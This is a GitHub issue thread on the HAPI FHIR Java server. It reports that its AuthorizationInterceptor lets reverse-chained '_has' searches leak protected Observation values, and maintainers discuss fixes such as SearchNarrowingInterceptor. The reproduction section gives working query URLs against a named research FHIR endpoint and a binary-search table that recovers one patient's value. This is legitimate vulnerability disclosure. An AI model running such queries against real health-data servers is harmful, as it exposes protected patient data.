hapifhir / hapi-fhir

🔥 HAPI FHIR - Java API for HL7 FHIR Clients and Servers
http://hapifhir.io
Apache License 2.0
1.94k stars 1.3k forks source link

Potential data security issue in HAPI JPA server AuthorizationInterceptor? #6065

Open mingward opened 3 days ago

mingward commented 3 days ago

Describe the bug The HAPI FHIR server AuthorizationInterceptor only limits the query results, not the resources that can be searched. Consequently, a user can craft queries to deduce the values in resources they should not have access to. This presents data leak threats to protected data.

To Reproduce Here is an example demonstrating the "data leak". Assume that on a FHIR server, we have two resources: a) Resource "Patient" has the patient ID twice de-identified. For demonstration purposes, we make this resource public so you can try it. The example URL is: https://dbgap-api.ncbi.nlm.nih.gov/fhir-jpa-small/x1/Patient?&_count=1

b) Resource "Observation" requires authorized access. So, https://dbgap-api.ncbi.nlm.nih.gov/fhir-jpa-small/x1/Observation shows a "denied access" message.

c) Next, we will show that even without authorization to the "Observation" resource, you can still use a set of queries to find out a patient's values in the "Observation" resource for a measurement called "phv00493247.v1.p1".

Step 1: Run the following query: https://dbgap-api.ncbi.nlm.nih.gov/fhir-jpa-small/x1/Patient?_has:Observation:patient?_has:Observation:patient:code-value-quantity=phv00493247.v1.p1$gt3

You will get 4 patients below. Using binary search to eventually deduce the measure of a patient in the series of query below.

| Query | Patients | What can be deduced |

| phv00493247.v1.p1$gt3 | 4 patients: | | | | ["3778609", "3778569", | | | | "3778606", "3778571"] | |

| phv00493247.v1.p1$gt4 | 0 | All 4 patients' value is between (3, 4) |

| phv00493247.v1.p1$gt3.5 | ["3778571"] | Patient 3778571 has value between (3.5, 4). | | | | Other 3 patients have value in (3, 3.5]. | | | | Continue with binary search. |

| phv00493247.v1.p1$gt3.75 | 0 | Patient 3778571 value in (3.5, 3.75] |

| phv00493247.v1.p1$gt3.625 | 0 | Patient 3778571 value in (3.5, 3.625] |

| phv00493247.v1.p1$gt3.5625 | ["3778571"] | Patient 3778571 value in (3.5625, 3.625] |

| phv00493247.v1.p1$gt3.59375| 0 | Patient 3778571 value in (3.5625, 3.59375] |

| phv00493247.v1.p1$gt3.578125| ["3778571"] | Patient 3778571 value in (3.578125, 3.59375] |

| phv00493247.v1.p1$gt3.5859375| 0 | Patient 3778571 value in (3.578125, 3.5859375] |

| phv00493247.v1.p1$eq3.58 | ["3778571"] | Patient 3778571 value is 3.58 |

Expected behavior For users with no authorization to Observation, the endpoint should give an error message.

Environment (please complete the following information):

Additional context In above demonstration, we assumed patient is public. But the same data leak exists if a user has authorization to a set of patients and a set of Observation belong to StudyA. This user has no authorization to Observation entries belong to StudyB. But with current AuthorizationInterceptor, the user can deduce the values belong to StudyB.

To use FHIR for research data including "controlled access data", it is of utter importance to prevent such data leak. Thank you in advance for your attention to this.

jamesagnew commented 3 days ago

Interesting. Do you have any suggestions on what a good fix would be for this issue?

I suppose the simplest solution would be to forbid _has searches when the authorization interceptor is in use at all. A slightly more refined option might be for it to ban them when any kind of compartment based rule is in place..

jamesagnew commented 3 days ago

Thinking this through a bit more... I guess what we should really be doing is blocking _has if there isn't a rule which allows "global" access to all resources of the source resource type for the _has expression.

mingward commented 3 days ago

Thanks. But reverse chaining searching is a great feature. Our tech lead has a few suggested fix.

Of the two fixes mentioned above, the favor is the security search narrowing interceptor. It will solve most of the problems faced by most users. It will also share code that can be polished along with the rest of the server and improve over time.

jamesagnew commented 3 days ago

Using SearchNarrowingInterceptor would certainly be an avenue.. I haven't thought it through completely but at first blush I suspect this would mitigate the attack you're describing. I'm not sure I follow the QueryRewritingInterceptor part - You should be able to achieve what you're describing using the stock SearchNarrowingInterceptor today, assuming your security rules are restricting the user to accessing a single patient compartment.